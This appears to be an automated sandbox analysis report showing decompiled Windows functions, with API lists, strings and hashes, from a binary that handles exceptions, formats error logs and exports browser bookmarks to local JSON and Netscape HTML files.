String ID:
API String ID: 1445889803-0
Opcode ID: 59498052e4cd185bb3d51540dac52aa14852f6082c9a7cefaaa9f8bca9f2afa0
Instruction ID: 567ddd7b56f4770fd4b75866ff8bd557648ed43178f552d6e03292df6ff58db5
Opcode Fuzzy Hash: 59498052e4cd185bb3d51540dac52aa14852f6082c9a7cefaaa9f8bca9f2afa0
Instruction Fuzzy Hash: 81116671D14308EBCB28CFB8E64869EBBF5FF08315F610966E922E7204E7308A44CB11

Uniqueness

Uniqueness Score: -1.00%

Function 011596D1, Relevance: 6.0, APIs: 4, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E011596D1(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				UnhandledExceptionFilter(_a4);
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x011596d8
0x011596e1
0x011596fa

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,01159807,01151000), ref: 011596D8
UnhandledExceptionFilter.KERNEL32(01159807,?,01159807,01151000), ref: 011596E1
GetCurrentProcess.KERNEL32(C0000409,?,01159807,01151000), ref: 011596EC
TerminateProcess.KERNEL32(00000000,?,01159807,01151000), ref: 011596F3

Memory Dump Source

Source File: 00000005.00000002.667280307.0000000001151000.00000020.00020000.sdmp, Offset: 01150000, based on PE: true

Associated: 00000005.00000002.667276136.0000000001150000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.667289439.000000000115A000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.667293879.000000000115B000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: c3add1be74a3ac95a454c5293cb7fc88946707e1b02b6df7e34c111c9d92308f
Instruction ID: 9406c6754ad7ba0fcd5f6ff32dbe94d22201eae648ab6651fe300fef3186f0fb
Opcode Fuzzy Hash: c3add1be74a3ac95a454c5293cb7fc88946707e1b02b6df7e34c111c9d92308f
Instruction Fuzzy Hash: 15D0C932008308EBCB642BE1EC0CA1A7F3AFB44212F044424F33982044DB714481CB69

Uniqueness

Uniqueness Score: -1.00%

Function 01156EB1, Relevance: 4.8, APIs: 3, Instructions: 336threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 01156F66
IsDebuggerPresent.KERNEL32 ref: 0115707F
OutputDebugStringW.KERNEL32(?,?,?,?,?,?,?,8007029C), ref: 01157125

Memory Dump Source

Source File: 00000005.00000002.667280307.0000000001151000.00000020.00020000.sdmp, Offset: 01150000, based on PE: true

Associated: 00000005.00000002.667276136.0000000001150000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.667289439.000000000115A000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.667293879.000000000115B000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentDebugDebuggerOutputPresentStringThread
String ID:
API String ID: 4268342597-0
Opcode ID: 6714a5b302676b5b8adbd2404087fd25b3518c3ffbace771b9e827c971d2a218
Instruction ID: 8ecf2e73128661089706be5d394b963cec6a5b43426b0ad1262e65acd37ba8d5
Opcode Fuzzy Hash: 6714a5b302676b5b8adbd2404087fd25b3518c3ffbace771b9e827c971d2a218
Instruction Fuzzy Hash: 97B11772A00304DBCBAD9F28E88566E7FA6FF89310F954129EE3597381CB359841CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 01159910, Relevance: 2.5, APIs: 2, Instructions: 32
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01159910(int __eax, void* __ecx) {
				void** _v8;
				int _t4;
				void* _t11;
				void** _t14;

				_t4 = __eax;
				_v8 = 0x115aa2c;
				_t14 = _v8;
				if(_t14 != 0x115aa54) {
					do {
						_t11 =  *_t14;
						while(_t11 != 0) {
							_t11 =  *(_t11 + 8);
							_t4 = HeapFree(GetProcessHeap(), 0, _t11);
						}
						 *_t14 = _t11;
						_t14 =  &(_t14[1]);
					} while (_t14 != 0x115aa54);
				}
				return _t4;
			}

0x01159910
0x01159917
0x01159924
0x01159929
0x0115992c
0x0115992c
0x01159943
0x01159931
0x0115993d
0x0115993d
0x01159947
0x01159949
0x0115994c
0x01159950
0x01159956

APIs

GetProcessHeap.KERNEL32(00000000), ref: 01159936
HeapFree.KERNEL32(00000000), ref: 0115993D

Memory Dump Source

Source File: 00000005.00000002.667280307.0000000001151000.00000020.00020000.sdmp, Offset: 01150000, based on PE: true

Associated: 00000005.00000002.667276136.0000000001150000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.667289439.000000000115A000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.667293879.000000000115B000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 3997144b1d6112b3b604ac7d72ffd7aefcf0448dfba886b4ae40154438d1636b
Instruction ID: c56a144f9bc68a9f8f056df5811012800a4153bfd657c0592cc50ec4a7ef4c1a
Opcode Fuzzy Hash: 3997144b1d6112b3b604ac7d72ffd7aefcf0448dfba886b4ae40154438d1636b
Instruction Fuzzy Hash: 38F0EC33504219E7CF685E5DA94455AF7BDEF84124B150159EEBC73100E3316C4087D1

Uniqueness

Uniqueness Score: -1.00%

Function 01158F20, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01158F20() {

				0x115a4a0->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(0x115a4a0);
				return 1;
			}

0x01158f25
0x01158f2f
0x01158f38

APIs

GetVersionExA.KERNEL32(0115A4A0), ref: 01158F2F

Memory Dump Source

Source File: 00000005.00000002.667280307.0000000001151000.00000020.00020000.sdmp, Offset: 01150000, based on PE: true

Associated: 00000005.00000002.667276136.0000000001150000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.667289439.000000000115A000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.667293879.000000000115B000.00000002.00020000.sdmp Download File

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: b90c3ce9904d937c478d1e95a88756153a542cadfe5f9dbf10f9b89b647bad61
Instruction ID: 7dfbdf9dc3a4dcaeb6f2959c3e50c6f5100b77f65a83760c23e766a929838df7
Opcode Fuzzy Hash: b90c3ce9904d937c478d1e95a88756153a542cadfe5f9dbf10f9b89b647bad61
Instruction Fuzzy Hash: 5AB092315A2240CAD3685BA0A42CB2F7BAAABA431AB84422890318A008C7A000408710

Uniqueness

Uniqueness Score: -1.00%

Function 01154B60, Relevance: 37.0, APIs: 6, Strings: 15, Instructions: 278
fileCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E01154B60(WCHAR* __ecx, void* __edx, void* __eflags) {
				void* _v8;
				long _v12;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _v32;
				int _v40;
				void* __edi;
				void* _t47;
				long _t87;
				WCHAR* _t93;
				void* _t95;
				int _t101;
				void* _t108;
				void* _t114;
				void* _t120;
				void* _t139;
				long _t140;
				long _t169;

				_t93 = __ecx;
				_t140 = 0x8000ffff;
				_v12 = __ecx;
				if(E011532E7(0x115a540) == 0) {
					L48:
					return _t140;
				}
				_t139 = 0;
				_t47 = CreateFileW(__ecx, 0x40000000, 0, 0, 2, 0x80, 0);
				 *0x115a06c = _t47;
				_t145 = _t47 - 0xffffffff;
				if(_t47 == 0xffffffff) {
					_t140 = GetLastError();
					E011546A2(L"FIREFOX", L"CreateTempBookmarkFile", _t140, 0x11519c4, 0x11519c4, _t93);
					goto L48;
				}
				E0115477D( &_v40);
				_t140 = E011547B1( &_v40, 0, _t145);
				if(_t140 < 0) {
					L43:
					_t53 = CloseHandle( *0x115a06c);
					while(1) {
						_t101 = _v40;
						if(_t101 == 0) {
							break;
						}
						_t53 =  *(_t101 + 4);
						_push(_t101);
						_v40 =  *(_t101 + 4);
						L01158F79();
					}
					E011548E1(_t53,  &_v32);
					goto L48;
				}
				_t140 = E01154831( &_v40, 0, L"roots");
				_t147 = _t140;
				if(_t140 < 0) {
					goto L43;
				}
				_t140 = E011547B1( &_v40, 0, _t147);
				if(_t140 < 0) {
					goto L43;
				}
				_t140 = E01154831( &_v40, 0, L"bookmark_bar");
				_t149 = _t140;
				if(_t140 < 0) {
					goto L43;
				}
				_t140 = E011547B1( &_v40, 0, _t149);
				if(_t140 < 0) {
					goto L43;
				}
				_t135 =  &_v40;
				_t108 = 3;
				_t140 = E01154900(_t108,  &_v40);
				_t94 = L"name";
				if(_t140 < 0) {
					_t135 = L"GetSortedBookmarksFromParentId";
					E01154601(L"FIREFOX", L"GetSortedBookmarksFromParentId", _t140, 3);
				} else {
					_t140 = E011552E9( &_v40,  &_v40, L"name", L"Bookmarks bar");
				}
				if(_t140 < 0) {
					goto L43;
				} else {
					_t140 = E011552E9( &_v40, _t135, L"type", L"folder");
					_t153 = _t140;
					if(_t140 < 0) {
						goto L43;
					}
					_t140 = E011547D1( &_v40, _t153);
					if(_t140 < 0) {
						goto L43;
					}
					_t140 = E01154831( &_v40, _t139, L"other");
					_t155 = _t140;
					if(_t140 < 0) {
						goto L43;
					}
					_t140 = E011547B1( &_v40, _t139, _t155);
					if(_t140 < 0) {
						goto L43;
					}
					_t136 =  &_v40;
					_t114 = 2;
					_t140 = E01154900(_t114,  &_v40);
					if(_t140 < 0) {
						_t136 = L"GetFolderChildren";
						E01154601(L"FIREFOX", L"GetFolderChildren", _t140, 2);
					} else {
						_t140 = E011552E9( &_v40,  &_v40, _t94, L"Bookmarks Menu");
					}
					if(_t140 < 0) {
						goto L43;
					} else {
						_t140 = E011552E9( &_v40, _t136, L"type", L"folder");
						_t159 = _t140;
						if(_t140 < 0) {
							goto L43;
						}
						_t140 = E011547D1( &_v40, _t159);
						if(_t140 < 0) {
							goto L43;
						}
						_t140 = E01154831( &_v40, _t139, L"other");
						_t161 = _t140;
						if(_t140 < 0) {
							goto L43;
						}
						_t140 = E011547B1( &_v40, _t139, _t161);
						if(_t140 < 0) {
							goto L43;
						}
						_t137 =  &_v40;
						_t120 = 5;
						_t140 = E01154900(_t120,  &_v40);
						if(_t140 < 0) {
							_t137 = L"GetFolderChildren";
							E01154601(L"FIREFOX", L"GetFolderChildren", _t140, 5);
						} else {
							_t140 = E011552E9( &_v40,  &_v40, _t94, L"Unsorted Bookmarks");
						}
						if(_t140 < 0) {
							goto L43;
						} else {
							_t140 = E011552E9( &_v40, _t137, L"type", L"folder");
							_t165 = _t140;
							if(_t140 < 0) {
								goto L43;
							}
							_t140 = E011547D1( &_v40, _t165);
							_t166 = _t140;
							if(_t140 < 0) {
								goto L43;
							}
							_t140 = E011547D1( &_v40, _t166);
							if(_t140 < 0) {
								goto L43;
							}
							_t140 = E01154831( &_v40, _t139, L"version");
							_t168 = _t140;
							if(_t140 == 0) {
								_t140 = E01154EE1(_t139, _t168,  &_v32, L"%d", 1);
								_t169 = _t140;
							}
							if(_t169 < 0) {
								goto L43;
							} else {
								_t140 = E011547D1( &_v40, _t169);
								if(_t140 < 0) {
									goto L43;
								}
								_t95 = _t139;
								_v8 = _t95;
								_t140 = E0115503F( &_v32, _t139);
								if(_t140 < 0) {
									L37:
									E011546A2(L"FIREFOX", L"GetSerializedJSONInCoTaskMemory", _t140, 0x11519c4, 0x11519c4, _v12);
									L38:
									if(_t140 >= 0) {
										_v12 = _v12 & 0x00000000;
										if(WriteFile( *0x115a06c, _t139, _t95 + _t95,  &_v12, 0) == 0) {
											_t140 = GetLastError();
										}
									}
									if(_t139 != 0) {
										__imp__CoTaskMemFree(_t139);
									}
									goto L43;
								}
								_t139 = _v32;
								_v32 = 0;
								_v24 = 0;
								_v20 = 0;
								if(_t140 < 0) {
									goto L37;
								}
								_t87 = E011545A4(_t139,  &_v8);
								_t95 = _v8;
								_t140 = _t87;
								goto L38;
							}
						}
					}
				}
			}

0x01154b6a
0x01154b6c
0x01154b77
0x01154b81
0x01154ed9
0x01154ee0
0x01154ee0
0x01154b87
0x01154b99
0x01154b9f
0x01154ba4
0x01154ba7
0x01154ebe
0x01154ed3
0x00000000
0x01154ed3
0x01154bb0
0x01154bbd
0x01154bc1
0x01154e8c
0x01154e92
0x01154ea7
0x01154ea7
0x01154eac
0x00000000
0x00000000
0x01154e9a
0x01154e9d
0x01154e9e
0x01154ea1
0x01154ea6
0x01154eb1
0x00000000
0x01154eb1
0x01154bd4
0x01154bd6
0x01154bd8
0x00000000
0x00000000
0x01154be6
0x01154bea
0x00000000
0x00000000
0x01154bfd
0x01154bff
0x01154c01
0x00000000
0x00000000
0x01154c0f
0x01154c13
0x00000000
0x00000000
0x01154c1b
0x01154c1e
0x01154c24
0x01154c26
0x01154c2d
0x01154c44
0x01154c4e
0x01154c2f
0x01154c3d
0x01154c3d
0x01154c55
0x00000000
0x01154c5b
0x01154c6d
0x01154c6f
0x01154c71
0x00000000
0x00000000
0x01154c7f
0x01154c83
0x00000000
0x00000000
0x01154c96
0x01154c98
0x01154c9a
0x00000000
0x00000000
0x01154ca8
0x01154cac
0x00000000
0x00000000
0x01154cb4
0x01154cb7
0x01154cbd
0x01154cc1
0x01154cd8
0x01154ce2
0x01154cc3
0x01154cd1
0x01154cd1
0x01154ce9
0x00000000
0x01154cef
0x01154d01
0x01154d03
0x01154d05
0x00000000
0x00000000
0x01154d13
0x01154d17
0x00000000
0x00000000
0x01154d2a
0x01154d2c
0x01154d2e
0x00000000
0x00000000
0x01154d3c
0x01154d40
0x00000000
0x00000000
0x01154d48
0x01154d4b
0x01154d51
0x01154d55
0x01154d6c
0x01154d76
0x01154d57
0x01154d65
0x01154d65
0x01154d7d
0x00000000
0x01154d83
0x01154d95
0x01154d97
0x01154d99
0x00000000
0x00000000
0x01154da7
0x01154da9
0x01154dab
0x00000000
0x00000000
0x01154db9
0x01154dbd
0x00000000
0x00000000
0x01154dd0
0x01154dd2
0x01154dd4
0x01154de6
0x01154deb
0x01154deb
0x01154ded
0x00000000
0x01154df3
0x01154dfb
0x01154dff
0x00000000
0x00000000
0x01154e05
0x01154e0a
0x01154e12
0x01154e16
0x01154e3c
0x01154e51
0x01154e56
0x01154e58
0x01154e5a
0x01154e77
0x01154e7f
0x01154e7f
0x01154e77
0x01154e83
0x01154e86
0x01154e86
0x00000000
0x01154e83
0x01154e18
0x01154e1d
0x01154e20
0x01154e23
0x01154e28
0x00000000
0x00000000
0x01154e30
0x01154e35
0x01154e38
0x00000000
0x01154e38
0x01154ded
0x01154d7d
0x01154ce9

APIs

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 01154B99
WriteFile.KERNEL32(00000000,00000000,00000000,00000000,type,folder,type,folder,type,folder,?,40000000,00000000,00000000,00000002,00000080), ref: 01154E6F
GetLastError.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 01154E79
CoTaskMemFree.OLE32(00000000,type,folder,type,folder,type,folder,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 01154E86
CloseHandle.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 01154E92
GetLastError.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 01154EB8

Strings

GetFolderChildren, xrefs: 01154CD8, 01154D6C
Bookmarks bar, xrefs: 01154C2F
roots, xrefs: 01154BC7
version, xrefs: 01154DC3
other, xrefs: 01154C89, 01154D1D
Unsorted Bookmarks, xrefs: 01154D57
Bookmarks Menu, xrefs: 01154CC3
GetSortedBookmarksFromParentId, xrefs: 01154C44
bookmark_bar, xrefs: 01154BF0
GetSerializedJSONInCoTaskMemory, xrefs: 01154E44
name, xrefs: 01154C26, 01154C34, 01154CC8, 01154D5C
FIREFOX, xrefs: 01154C49, 01154CDD, 01154D71, 01154E4C, 01154ECB
type, xrefs: 01154C60, 01154CF4, 01154D88
folder, xrefs: 01154C5B, 01154CEF, 01154D83
CreateTempBookmarkFile, xrefs: 01154EC0

Memory Dump Source

Source File: 00000005.00000002.667280307.0000000001151000.00000020.00020000.sdmp, Offset: 01150000, based on PE: true

Associated: 00000005.00000002.667276136.0000000001150000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.667289439.000000000115A000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.667293879.000000000115B000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLast$CloseCreateFreeHandleTaskWrite
String ID: Bookmarks Menu$Bookmarks bar$CreateTempBookmarkFile$FIREFOX$GetFolderChildren$GetSerializedJSONInCoTaskMemory$GetSortedBookmarksFromParentId$Unsorted Bookmarks$bookmark_bar$folder$name$other$roots$type$version
API String ID: 161372413-2624214029
Opcode ID: 43f57b0937a901d5f3727891c1bf850bf29fc364a1518cc552a0dcfe9636c41f
Instruction ID: 8aa68951c6c5a6103fad5fb69a85e1a4c90f2f88df88edf4365ef6aaffea268a
Opcode Fuzzy Hash: 43f57b0937a901d5f3727891c1bf850bf29fc364a1518cc552a0dcfe9636c41f
Instruction Fuzzy Hash: F891F632D01636E7CBAEE6A4D911BEE7AB4DF14B54B110255DE31B7A40FB709D8087E0

Uniqueness

Uniqueness Score: -1.00%

Function 01156A55, Relevance: 26.4, APIs: 2, Strings: 13, Instructions: 173
windowthreadCOMMON

Download Yara Rule

C-Code - Quality: 33%

			E01156A55(char* __ecx, signed int __edx, intOrPtr* _a4) {
				signed int _v8;
				short _v520;
				intOrPtr _v524;
				char* _v528;
				signed int _v532;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t40;
				intOrPtr _t45;
				intOrPtr _t47;
				intOrPtr _t51;
				intOrPtr _t52;
				void* _t55;
				void* _t56;
				intOrPtr _t60;
				void* _t61;
				void* _t62;
				char* _t67;
				intOrPtr* _t78;
				signed int _t80;
				void* _t81;
				void* _t82;
				void* _t83;
				void* _t84;

				_t77 = __edx;
				_t40 =  *0x115a064; // 0xc03c63c6
				_v8 = _t40 ^ _t80;
				_v532 = __edx;
				_t67 = __ecx;
				_v528 = __ecx;
				_t78 = _a4;
				if(__edx == 0 || __ecx == 0) {
					L32:
					return E01159250(0, _t67, _v8 ^ _t80, _t77, _t78, _t79);
				} else {
					 *((short*)(__ecx)) = 0;
					_t45 =  *0x115a3f0; // 0x0
					_v524 = _t45;
					if(_t45 == 0 ||  *0x115a3fc == 0) {
						L7:
						_t47 =  *_t78;
						if(_t47 == 0) {
							_t67 = "Exception";
						} else {
							_t61 = _t47 - 1;
							if(_t61 == 0) {
								_t67 = "ReturnHr";
							} else {
								_t62 = _t61 - 1;
								if(_t62 == 0) {
									_t67 = "LogHr";
								} else {
									if(_t62 == 1) {
										_t67 = "FailFast";
									}
								}
							}
						}
						_v520 = 0;
						FormatMessageW(0x1200, 0,  *(_t78 + 4), 0x400,  &_v520, 0x100, 0);
						_t98 =  *((intOrPtr*)(_t78 + 0x1c));
						_t51 = _v528;
						_push( *((intOrPtr*)(_t78 + 0x48)));
						_push( *((intOrPtr*)(_t78 + 0x44)));
						_t79 = _t51 + _v532 * 2;
						if( *((intOrPtr*)(_t78 + 0x1c)) == 0) {
							_push(L"%hs!%p: ");
							_push(_t79);
							_push(_t51);
							_t52 = E01156A16(__eflags);
							_t82 = _t81 + 0x14;
						} else {
							_push( *((intOrPtr*)(_t78 + 0x20)));
							_t52 = E01156A16(_t98, _t51, _t79, L"%hs(%d)\\%hs!%p: ",  *((intOrPtr*)(_t78 + 0x1c)));
							_t82 = _t81 + 0x1c;
						}
						_t99 =  *((intOrPtr*)(_t78 + 0x4c));
						_v524 = _t52;
						if( *((intOrPtr*)(_t78 + 0x4c)) != 0) {
							_t60 = E01156A16(_t99, _t52, _t79, L"(caller: %p) ",  *((intOrPtr*)(_t78 + 0x4c)));
							_t82 = _t82 + 0x10;
							_v524 = _t60;
						}
						_push( &_v520);
						_push( *(_t78 + 4));
						_push(GetCurrentThreadId());
						_push( *((intOrPtr*)(_t78 + 0x24)));
						_t55 = E01156A16(_t99, _v524, _t79, L"%hs(%d) tid(%x) %08X %ws", _t67);
						_t83 = _t82 + 0x20;
						if( *((intOrPtr*)(_t78 + 0xc)) != 0 ||  *((intOrPtr*)(_t78 + 0x28)) != 0) {
							L23:
							_push(L"    ");
							_push(_t79);
							_push(_t55);
							_t56 = E01156A16(_t102);
							_t84 = _t83 + 0xc;
							_t103 =  *((intOrPtr*)(_t78 + 0xc));
							if( *((intOrPtr*)(_t78 + 0xc)) != 0) {
								_t56 = E01156A16(_t103, _t56, _t79, L"Msg:[%ws] ",  *((intOrPtr*)(_t78 + 0xc)));
								_t84 = _t84 + 0x10;
							}
							_t104 =  *((intOrPtr*)(_t78 + 0x28));
							if( *((intOrPtr*)(_t78 + 0x28)) != 0) {
								_t56 = E01156A16(_t104, _t56, _t79, L"CallContext:[%hs] ",  *((intOrPtr*)(_t78 + 0x28)));
								_t84 = _t84 + 0x10;
							}
							_t105 =  *((intOrPtr*)(_t78 + 0x14));
							if( *((intOrPtr*)(_t78 + 0x14)) == 0) {
								__eflags =  *((intOrPtr*)(_t78 + 0x18));
								if(__eflags == 0) {
									_push("\n");
									_push(_t79);
									_push(_t56);
									E01156A16(__eflags);
								} else {
									E01156A16(__eflags, _t56, _t79, L"[%hs]\n",  *((intOrPtr*)(_t78 + 0x18)));
								}
							} else {
								_push( *((intOrPtr*)(_t78 + 0x14)));
								E01156A16(_t105, _t56, _t79, L"[%hs(%hs)]\n",  *((intOrPtr*)(_t78 + 0x18)));
							}
							goto L32;
						} else {
							_t102 =  *((intOrPtr*)(_t78 + 0x18));
							if( *((intOrPtr*)(_t78 + 0x18)) == 0) {
								goto L32;
							}
							goto L23;
						}
					} else {
						_t79 = _t81;
						 *0x115b1b4(_t78, __ecx, __edx);
						_v524();
						if(_t81 != _t81) {
							asm("int 0x29");
						}
						if(( *_t67 & 0x0000ffff) != 0) {
							goto L32;
						}
						goto L7;
					}
				}
			}

0x01156a55
0x01156a60
0x01156a67
0x01156a6a
0x01156a71
0x01156a73
0x01156a7b
0x01156a80
0x01156c5d
0x01156c6f
0x01156a8e
0x01156a90
0x01156a93
0x01156a98
0x01156aa0
0x01156ad5
0x01156ade
0x01156ae0
0x01156b06
0x01156ae2
0x01156ae2
0x01156ae5
0x01156aff
0x01156ae7
0x01156ae7
0x01156aea
0x01156af8
0x01156aec
0x01156aef
0x01156af1
0x01156af1
0x01156aef
0x01156aea
0x01156ae5
0x01156b13
0x01156b2f
0x01156b35
0x01156b39
0x01156b45
0x01156b48
0x01156b4b
0x01156b4e
0x01156b67
0x01156b6c
0x01156b6d
0x01156b6e
0x01156b73
0x01156b50
0x01156b50
0x01156b5d
0x01156b62
0x01156b62
0x01156b76
0x01156b7a
0x01156b80
0x01156b8c
0x01156b91
0x01156b94
0x01156b94
0x01156ba0
0x01156ba1
0x01156baa
0x01156bab
0x01156bbb
0x01156bc2
0x01156bc8
0x01156bd8
0x01156bd8
0x01156bdd
0x01156bde
0x01156bdf
0x01156be4
0x01156be7
0x01156beb
0x01156bf7
0x01156bfc
0x01156bfc
0x01156bff
0x01156c03
0x01156c0f
0x01156c14
0x01156c14
0x01156c17
0x01156c1b
0x01156c34
0x01156c38
0x01156c4e
0x01156c53
0x01156c54
0x01156c55
0x01156c3a
0x01156c44
0x01156c49
0x01156c1d
0x01156c1d
0x01156c2a
0x01156c2f
0x00000000
0x01156bcf
0x01156bcf
0x01156bd2
0x00000000
0x00000000
0x00000000
0x01156bd2
0x01156aab
0x01156aab
0x01156ab2
0x01156ab8
0x01156ac0
0x01156ac7
0x01156ac7
0x01156acf
0x00000000
0x00000000
0x00000000
0x01156acf
0x01156aa0

APIs

FormatMessageW.KERNEL32(00001200,00000000,?,00000400,?,00000100,00000000), ref: 01156B2F
GetCurrentThreadId.KERNEL32 ref: 01156BA4

Strings

ReturnHr, xrefs: 01156AFF
LogHr, xrefs: 01156AF8
%hs(%d)\%hs!%p: , xrefs: 01156B56
%hs(%d) tid(%x) %08X %ws, xrefs: 01156BAF
Msg:[%ws] , xrefs: 01156BF0
(caller: %p) , xrefs: 01156B85
[%hs], xrefs: 01156C3D
%hs!%p: , xrefs: 01156B67
CallContext:[%hs] , xrefs: 01156C08
Exception, xrefs: 01156B06, 01156BAE
[%hs(%hs)], xrefs: 01156C23
, xrefs: 01156BD8
FailFast, xrefs: 01156AF1

Memory Dump Source

Source File: 00000005.00000002.667280307.0000000001151000.00000020.00020000.sdmp, Offset: 01150000, based on PE: true

Associated: 00000005.00000002.667276136.0000000001150000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.667289439.000000000115A000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.667293879.000000000115B000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentFormatMessageThread
String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%d)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
API String ID: 2411632146-2849347638
Opcode ID: aa27636b271e9f5b1d591f78769e4a12f8fd29e6d263063e629b06bd80941f00
Instruction ID: 48b620755ac62729638467e3e9d0976ad828228a486635b882699c1618b2c51d
Opcode Fuzzy Hash: aa27636b271e9f5b1d591f78769e4a12f8fd29e6d263063e629b06bd80941f00
Instruction Fuzzy Hash: 2151E772A00316FBDBAC5E6ACD48F667B78FF14354F408159EE34A2511E7319990CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 0115441E, Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 113
filelibraryCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E0115441E(WCHAR* __ecx, void* __eflags, void* __fp0) {
				signed int _v8;
				char _v532;
				struct HINSTANCE__* _v540;
				struct HINSTANCE__* _v544;
				struct HINSTANCE__* _v548;
				char _v580;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t11;
				struct HINSTANCE__* _t14;
				void* _t16;
				struct HINSTANCE__* _t25;
				int _t27;
				struct HINSTANCE__* _t34;
				struct HINSTANCE__* _t41;
				void* _t50;
				void* _t52;
				struct HINSTANCE__* _t54;
				signed int _t57;
				intOrPtr* _t58;

				_t64 = __fp0;
				_t11 =  *0x115a064; // 0xc03c63c6
				_v8 = _t11 ^ _t57;
				_t53 = __ecx;
				_t54 = 0;
				if(E011532E7(0x115a540) == 0) {
					L9:
					_t14 = _t54;
					L10:
					return E01159250(_t14, _t41, _v8 ^ _t57, _t53, _t54, _t56);
				}
				_t16 = CreateFileW(__ecx, 0x40000000, 0, 0, 2, 0x80, 0);
				 *0x115a06c = _t16;
				if(_t16 != 0xffffffff) {
					_push(L"<!DOCTYPE NETSCAPE-Bookmark-file-");
					E01154004(_t41);
					 *_t58 = L"1>";
					E011540B5(_t41);
					 *_t58 = L"<!-- This is an automatically generated file.\r\nIt will be read and overwritten.\r\nDo Not Edit! -->";
					E011540B5(_t41);
					 *_t58 = L"<TITLE>Bookmarks</TITLE>\r\n<H1>Bookmarks</H1>";
					E011540B5(_t41);
					 *_t58 = L"<DL><p>";
					E011540B5(_t41);
					_t47 = 2;
					E01154181(_t47, _t53, __eflags, __fp0);
					_t41 = LoadLibraryExW(L"ieframe.dll", 0, 0x60);
					__eflags = _t41;
					if(__eflags != 0) {
						_t58 = _t58 - 0xc;
						_t47 = _t41;
						_t34 = E01155DFA(_t41, _t53,  &_v532);
						_t56 = _t34;
						FreeLibrary(_t41);
						__eflags = _t34;
						if(__eflags >= 0) {
							E011540B5(_t41, L"<DT><H3 FOLDED>%s</H3>",  &_v532);
							_push(L"<DL><p>");
							E011540B5(_t41);
							_t58 = _t58 + 0xc;
							_t52 = 3;
							E01154181(_t52, _t53, __eflags, __fp0);
							_push(L"</DL><p>");
							E011540B5(_t41);
							_pop(_t47);
						}
					}
					_v548 = _t54;
					_v544 = _t54;
					_v540 = _t54;
					_t25 = E01153B8E(_t41, _t53, __eflags, _t47,  &_v580);
					__eflags = _t25;
					if(_t25 >= 0) {
						E011540B5(_t41, L"<DT><H3 FOLDED>%s</H3>", _v548);
						_push(L"<DL><p>");
						E011540B5(_t41);
						_t50 = 5;
						E01154181(_t50, _t53, __eflags, _t64);
						_push(L"</DL><p>");
						E011540B5(_t41);
					}
					_push(L"</DL><p>");
					E011540B5(_t41);
					_t27 = CloseHandle( *0x115a06c);
					_t54 = 1;
					__eflags = 1;
					E01153FD0(_t27,  &_v580);
					goto L9;
				}
				_t14 = 0;
				goto L10;
			}

0x0115441e
0x01154429
0x01154430
0x01154436
0x01154438
0x01154446
0x01154591
0x01154591
0x01154593
0x011545a3
0x011545a3
0x0115445c
0x01154462
0x0115446a
0x01154473
0x01154478
0x0115447d
0x01154484
0x01154489
0x01154490
0x01154495
0x0115449c
0x011544a1
0x011544a8
0x011544b0
0x011544b1
0x011544c4
0x011544c6
0x011544c8
0x011544ca
0x011544d3
0x011544d6
0x011544dc
0x011544de
0x011544e4
0x011544e6
0x011544f4
0x011544f9
0x011544fe
0x01154503
0x01154508
0x01154509
0x0115450e
0x01154513
0x01154518
0x01154518
0x011544e6
0x0115451f
0x01154527
0x0115452d
0x01154533
0x01154538
0x0115453a
0x01154547
0x0115454c
0x01154551
0x0115455b
0x0115455c
0x01154561
0x01154566
0x0115456b
0x0115456c
0x01154571
0x0115457d
0x0115458b
0x0115458b
0x0115458c
0x00000000
0x0115458c
0x0115446c
0x00000000

APIs

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0115445C
LoadLibraryExW.KERNEL32(ieframe.dll,00000000,00000060,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 011544BE
FreeLibrary.KERNEL32(00000000,?), ref: 011544DE
CloseHandle.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0115457D

Strings

